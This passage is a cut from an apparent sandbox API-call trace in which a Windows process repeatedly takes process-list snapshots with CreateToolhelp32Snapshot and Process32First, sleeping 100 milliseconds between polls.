(dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0270.232] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.302] Sleep (dwMilliseconds=0x64) [0270.308] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0270.326] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.411] Sleep (dwMilliseconds=0x64) [0270.415] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0270.429] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.513] Sleep (dwMilliseconds=0x64) [0270.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0270.533] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.626] Sleep (dwMilliseconds=0x64) [0270.630] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0270.662] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.756] Sleep (dwMilliseconds=0x64) [0270.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0270.778] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.881] Sleep (dwMilliseconds=0x64) [0270.887] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0270.905] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.996] Sleep (dwMilliseconds=0x64) [0271.002] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0271.014] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.105] Sleep (dwMilliseconds=0x64) [0271.108] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0271.121] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.333] Sleep (dwMilliseconds=0x64) [0271.336] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0271.378] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.488] Sleep (dwMilliseconds=0x64) [0271.493] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0271.514] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.589] Sleep (dwMilliseconds=0x64) [0271.592] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0271.619] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.797] Sleep (dwMilliseconds=0x64) [0271.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0271.854] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.949] Sleep (dwMilliseconds=0x64) [0271.952] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0271.972] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.062] Sleep (dwMilliseconds=0x64) [0272.069] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0272.087] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.189] Sleep (dwMilliseconds=0x64) [0272.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0272.233] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.329] Sleep (dwMilliseconds=0x64) [0272.373] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0272.396] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.530] Sleep (dwMilliseconds=0x64) [0272.533] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0272.555] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.653] Sleep (dwMilliseconds=0x64) [0272.667] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0272.687] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.770] Sleep (dwMilliseconds=0x64) [0272.777] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0272.795] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.894] Sleep (dwMilliseconds=0x64) [0272.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0272.917] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.018] Sleep (dwMilliseconds=0x64) [0273.021] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0273.038] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.147] Sleep (dwMilliseconds=0x64) [0273.156] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0273.177] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.278] Sleep (dwMilliseconds=0x64) [0273.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0273.294] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.389] Sleep (dwMilliseconds=0x64) [0273.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0273.424] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.536] Sleep (dwMilliseconds=0x64) [0273.545] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0273.568] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.745] Sleep (dwMilliseconds=0x64) [0273.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0273.774] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.857] Sleep (dwMilliseconds=0x64) [0273.863] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0273.877] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.970] Sleep (dwMilliseconds=0x64) [0273.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0273.991] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.096] Sleep (dwMilliseconds=0x64) [0274.100] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0274.117] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.236] Sleep (dwMilliseconds=0x64) [0274.241] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0274.253] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.323] Sleep (dwMilliseconds=0x64) [0274.329] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0274.343] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.412] Sleep (dwMilliseconds=0x64) [0274.422] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0274.436] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.506] Sleep (dwMilliseconds=0x64) [0274.508] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0274.520] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.607] Sleep (dwMilliseconds=0x64) [0274.612] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0274.633] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.719] Sleep (dwMilliseconds=0x64) [0274.748] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0274.767] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.909] Sleep (dwMilliseconds=0x64) [0274.915] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0274.930] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.005] Sleep (dwMilliseconds=0x64) [0275.015] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0275.031] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.113] Sleep (dwMilliseconds=0x64) [0275.115] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0275.128] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.223] Sleep (dwMilliseconds=0x64) [0275.227] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0275.241] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.317] Sleep (dwMilliseconds=0x64) [0275.323] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0275.341] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.414] Sleep (dwMilliseconds=0x64) [0275.416] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0275.434] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.511] Sleep (dwMilliseconds=0x64) [0275.515] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0275.528] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.600] Sleep (dwMilliseconds=0x64) [0275.606] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0275.617] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.689] Sleep (dwMilliseconds=0x64) [0275.693] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0275.707] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.783] Sleep (dwMilliseconds=0x64) [0275.790] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0275.804] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.874] Sleep (dwMilliseconds=0x64) [0275.879] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0275.895] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.972] Sleep (dwMilliseconds=0x64) [0275.975] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0275.986] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.114] Sleep (dwMilliseconds=0x64) [0276.120] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0276.140] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.270] Sleep (dwMilliseconds=0x64) [0276.273] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0276.294] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.390] Sleep (dwMilliseconds=0x64) [0276.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0276.417] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.517] Sleep (dwMilliseconds=0x64) [0276.522] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0276.541] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.643] Sleep (dwMilliseconds=0x64) [0276.647] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0276.662] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.756] Sleep (dwMilliseconds=0x64) [0276.759] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0276.774] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.854] Sleep (dwMilliseconds=0x64) [0276.858] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0276.871] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.952] Sleep (dwMilliseconds=0x64) [0276.956] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0276.969] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.066] Sleep (dwMilliseconds=0x64) [0277.074] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0277.092] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.282] Sleep (dwMilliseconds=0x64) [0277.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0277.303] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.388] Sleep (dwMilliseconds=0x64) [0277.394] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0277.409] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.501] Sleep (dwMilliseconds=0x64) [0277.507] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0277.522] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.620] Sleep (dwMilliseconds=0x64) [0277.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0277.641] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 